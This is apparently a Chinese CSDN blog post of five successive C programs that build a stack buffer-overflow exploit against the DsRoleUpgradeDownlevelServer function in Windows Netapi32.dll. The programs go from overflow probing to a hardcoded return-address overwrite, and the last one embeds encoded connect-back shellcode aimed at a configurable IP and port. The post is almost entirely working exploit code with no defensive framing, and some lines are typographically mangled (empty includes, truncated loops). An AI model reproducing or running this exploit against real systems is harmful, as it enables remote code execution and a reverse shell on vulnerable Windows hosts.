Some resources about stack exploit

最新推荐文章于 2021-03-05 09:17:59 发布
最新推荐文章于 2021-03-05 09:17:59 发布
阅读量1k 收藏
点赞数
分类专栏: 我的收藏-->Hacker's log 文章标签: resources function c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/net0r/article/details/45581
版权

1.include
#include

#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
                (unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long);

DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define MAXLEN 5000

char buf[2*MAXLEN];
char buf2[2000];

void main(int argc, char**argv)
{
   
    int i;

    HMODULE hNetapi = LoadLibrary("Netapi32.dll");
    if ( !hNetapi )
    {
        printf("Can't load Netapi32.dll.../n");
        return;
    }
   
    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
   
    if ( !DsRoleUpgradeDownlevelServer )
    {
        printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
        return;
    }

    //Unicode (xx 00 xx 00 xx 00)
    memset(buf, 0, MAXLEN*2);
    for(i=0; i         buf[2*i] = 'A';
   
    DsRoleUpgradeDownlevelServer(
                (unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
    return;
}

2.

#include
#include

#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
                (unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long);

DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define MAXLEN 5000

char buf[2*MAXLEN];
char buf2[2000];

void main(int argc, char**argv)
{
   
    int i;

    HMODULE hNetapi = LoadLibrary("Netapi32.dll");
    if ( !hNetapi )
    {
        printf("Can't load Netapi32.dll.../n");
        return;
    }
   
    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
   
    if ( !DsRoleUpgradeDownlevelServer )
    {
        printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
        return;
    }

    //Unicode (xx 00 xx 00 xx 00)
    memset(buf, 0, MAXLEN*2);
    for(i=0; i         buf[2*i] = (char)(i % 100 + 100);
   
    DsRoleUpgradeDownlevelServer(
                (unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
    return;
}

3.

#include
#include

#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
                (unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long);

DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define MAXLEN 5000

char buf[2*MAXLEN];
char buf2[2000];

void main(int argc, char**argv)
{
   
    int i;

    HMODULE hNetapi = LoadLibrary("Netapi32.dll");
    if ( !hNetapi )
    {
        printf("Can't load Netapi32.dll.../n");
        return;
    }
   
    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
   
    if ( !DsRoleUpgradeDownlevelServer )
    {
        printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
        return;
    }

    //Unicode (xx 00 xx 00 xx 00)
    memset(buf, 0, MAXLEN*2);
    for(i=0; i         buf[2*i] = (char)(i / 100 + 100);
   
    DsRoleUpgradeDownlevelServer(
                (unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
    return;
}

4.

#include
#include

#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
                (unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long);

DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define MAXLEN 5000

char buf[2*MAXLEN];
char buf2[2000];

void main(int argc, char**argv)
{
   
    int i;

    HMODULE hNetapi = LoadLibrary("Netapi32.dll");
    if ( !hNetapi )
    {
        printf("Can't load Netapi32.dll.../n");
        return;
    }
   
    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
   
    if ( !DsRoleUpgradeDownlevelServer )
    {
        printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
        return;
    }

    //Unicode (xx 00 xx 00 xx 00)
    memset(buf, 0, MAXLEN*2);
    for(i=0; i         buf[2*i] = (char)(i / 100 + 100);
   

 //i = 2844 ~ 2847, values 0x7FFA1571
 buf[2*2844] = 0x71;
 buf[2*2845] = 0x15;
 buf[2*2846] = 0xFA;
 buf[2*2847] = 0x7F;

    DsRoleUpgradeDownlevelServer(
                (unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
    return;
}

5.

#include
#include

#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
                (unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long,
                 unsigned long, unsigned long, unsigned long, unsigned long);

DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define MAXLEN 5000

char buf[2*MAXLEN];
char buf2[2000];


#define PORT_OFFSET  118
#define IP_OFFSET    111

char Shellcode[] = "/xEB/x10/x5B/x4B/x33/xC9/x66/xB9/x25/x01/x80/x34/x0B/x99/xE2/xFA"
     "/xEB/x05/xE8/xEB/xFF/xFF/xFF"
     "/x70/x62/x99/x99/x99/xC6/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
     "/xE9/x85/x34/x12/xF1/x91/x12/x6E/xF3/x9D/xC0/x71/x02/x99/x99/x99"
     "/x7B/x60/xF1/xAA/xAB/x99/x99/xF1/xEE/xEA/xAB/xC6/xCD/x66/x8F/x12"
     "/x71/xF3/x9D/xC0/x71/x1B/x99/x99/x99/x7B/x60/x18/x75/x09/x98/x99"
     "/x99/xCD/xF1/x98/x98/x99/x99/x66/xCF/x89/xC9/xC9/xC9/xC9/xD9/xC9"
     "/xD9/xC9/x66/xCF/x8D/x12/x41/xF1/xE6/x99/x99/x98/xF1/x9B/x99/x99"
     "/xAC/x12/x55/xF3/x89/xC8/xCA/x66/xCF/x81/x1C/x59/xEC/xD3/xF1/xFA"
     "/xF4/xFD/x99/x10/xFF/xA9/x1A/x75/xCD/x14/xA5/xBD/xF3/x8C/xC0/x32"
     "/x7B/x64/x5F/xDD/xBD/x89/xDD/x67/xDD/xBD/xA4/x10/xC5/xBD/xD1/x10"
     "/xC5/xBD/xD5/x10/xC5/xBD/xC9/x14/xDD/xBD/x89/xCD/xC9/xC8/xC8/xC8"
     "/xF3/x98/xC8/xC8/x66/xEF/xA9/xC8/x66/xCF/x9D/x12/x55/xF3/x66/x66"
     "/xA8/x66/xCF/x91/xCA/x66/xCF/x85/x66/xCF/x95/xC8/xCF/x12/xDC/xA5"
     "/x12/xCD/xB1/xE1/x9A/x4C/xCB/x12/xEB/xB9/x9A/x6C/xAA/x50/xD0/xD8"
     "/x34/x9A/x5C/xAA/x42/x96/x27/x89/xA3/x4F/xED/x91/x58/x52/x94/x9A"
     "/x43/xD9/x72/x68/xA2/x86/xEC/x7E/xC3/x12/xC3/xBD/x9A/x44/xFF/x12"
     "/x95/xD2/x12/xC3/x85/x9A/x44/x12/x9D/x12/x9A/x5C/x32/xC7/xC0/x5A"
     "/x71/x99/x66/x66/x66/x17/xD7/x97/x75/xEB/x67/x2A/x8F/x34/x40/x9C"
     "/x57/xE7/x41/x7B/xEA/x52/x74/x65/xA2/x40/x90/x6C/x34/x75/x60/x33"
     "/xF9/x7E/xE0/x5F/xE0";

void MShell(char *h, char *p)
{
 unsigned short    port;
    unsigned long     ip;

 port = htons(atoi(p))^(USHORT)0x9999;
 ip = inet_addr(h)^(ULONG)0x99999999;
 memcpy(&Shellcode[PORT_OFFSET], &port, 2);
 memcpy(&Shellcode[IP_OFFSET], &ip, 4);
}

void main(int argc, char**argv)
{
   
    int i;

    HMODULE hNetapi = LoadLibrary("Netapi32.dll");
    if ( !hNetapi )
    {
        printf("Can't load Netapi32.dll.../n");
        return;
    }
   
    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
   
    if ( !DsRoleUpgradeDownlevelServer )
    {
        printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
        return;
    }

    //Unicode (xx 00 xx 00 xx 00)
    memset(buf, 0, MAXLEN*2);
    for(i=0; i         buf[2*i] = (char)(i / 100 + 100);
   

 //i = 2844 ~ 2847, values 0x7FFA1571
 buf[2*2844] = 0x71;
 buf[2*2845] = 0x15;
 buf[2*2846] = 0xFA;
 buf[2*2847] = 0x7F;

 //i = 2840 ~ 2843, nop/nop/jmp 4, values 90 90 EB 04
 buf[2*2840] = 0x90;
 buf[2*2841] = 0x90;
 buf[2*2842] = 0xEB;
 buf[2*2843] = 0x04;

 MShell("127.0.0.1", "1111");          //shellcode connect back to port 1111

 for(i=0;i < sizeof(Shellcode);i++)
  buf[2*(i+2848)] = Shellcode[i];

    DsRoleUpgradeDownlevelServer(
                (unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
                (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
    return;
}

net0r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++栈stack算法 最全面
07-23
stackstack算法:算法训练营 P68~74 题目类型 :栈stack问题 P69~74 原题解析 :见算法训练营 P74~74 */ #include using namespace std; int main() { cout栈算法"; cout初始值为 ...
webstack1.09.zip
06-27
webstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack1.09.zipwebstack...
让我们摒弃一些浮躁 -- 对Norton误报WinXP事件的技术分析
06-13 7167
申明:言论仅代表个人,与所在公司无任何联系。 这两天看到不少有关Norton误报WinXP中文版的两个系统文件为病毒的报道。 不过,今天在CSDN blog 上看到了王开源先生的一篇文章,“从诺顿误杀WinXP后门误猜国家机密被窃取”。读完以后,首先,我觉得非常失望。我衷心希望我们的Open Source不要沦落到需要炒作类似街头花边新闻来吸引眼球的地步。任何时候,都让我们
Exploit writing tutorial part1: Stack Based Overflows
Nixawk
06-28 2296
Author: Corelan Team (corelanc0d3r) Modify: Nixawk This tutorial will show you how to exploit a software from stack overflow.Requirements Software: Easy RM to MP3 Converter Version 2.7.3.700.2006.09
Stack Based Windows Buffer Overflow Tutorial
weixin_34061482的博客
11-08 288
Introduction One thing I have always maintained is that aspiring or practicing penetration testers who use an exploitation product (such as CANVAS, Core Impact, Metasploit) shou...
Fortinet Single Sign On Stack Overflow
stonesharp的专栏
03-30 879
Fortinet Single Sign On Stack Overflow 1. ADVISORY INFORMATION Title: Fortinet Single Sign On Stack Overflow Advisory ID: CORE-2015-0006 Advisory URL: http:
Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
I'm a hack----
11-01 1万+
In all previous tutorials in this Exploit writing tutorial series, we have looked at building exploits that would work on Windows XP / 2003 server. The success of all of these exploits (whether they
移动安全资源大全
Abracadabra的专栏
02-08 3201
Mobile Security Wiki One Stop for Mobile Security Resources 来源:https://mobilesecuritywiki.com/ Last Updated on: 12-8-2016
C语言头文件 STACK
06-13
C语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 ...
stack_c.rar_Stack
最新发布
09-21
在编程领域,栈(Stack)是一种非常基础且重要的数据结构,尤其在C++编程中有着广泛应用。本资源“stack_c.rar_Stack”显然是一个关于C++实现栈的压缩包,包含了一个名为“stack_c.c”的源代码文件。下面将详细讨论...
开发者必备英文网站合集
ejinxian的专栏
07-01 4493
这是一份对开发者有用的英文网站清单,涉及到从初学者到行业大牛成长的方方面面,还有很多事英语学习的网站,请相信我,这些肯定会对你有所帮助的。 ​​问答社区 Stack Overflow: subscribe to their weekly newsletter and any other topic which you find interesting Quora: A ...
全日制英国硕士词汇篇V1.3(持续更新)
热门推荐
欢迎!欢迎来到17号城市!
03-05 6万+
下面的所有词汇与例句都是在英国留学期间, 学到的、听到的、见到的,都来自英语母语使用者,其中包括: 学校、同学、教授、教职人员、以及生活中形形色色的人, 这篇文章有助于还没去英国的同学提前掌握一些高频词汇, 以便于在日后的留学生活中更加游刃有余, 对于高频词汇一定要掌握它们的听说读写,形成肌肉记忆。
怎样在Mysql中直接储存图片
net0r的专栏
10-22 4792
作者: Florian Dittmer 翻译:netmad 如果你想把二进制的数据,比如说图片文件和HTML文件,直接保存在你的MySQL数据库,那么这篇文章就是为你而写的! 我将告诉你怎样通过HTML表单来储存这些文件,怎样访问和使用这些文件。 本文概述: 在mysql中建立一个新的数据库 一个怎样储存文件的例子程序 一个怎样访问文件的例子程序 在mysql中建立一个新的database 首先,
delphi service
net0r的专栏
08-09 2259
program Project1;uses? SvcMgr,? service in service.pas {netor1: TService},? thread in thread.pas;{$R *.RES}begin? Application.Initialize;? Application.CreateForm(Tnetor1, netor1);? Applicati
Z-Stack OSAL API 中文翻译
"Z-Stack操作系统抽象层应用程序编程接口(中文)是Z-Stack协议栈的一部分,由德州仪器公司发布,旨在为不同的操作系统提供统一的编程接口。此API的中文版由郑州新双恒翻译,方便中国开发者理解和使用。Z-Stack OSAL ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值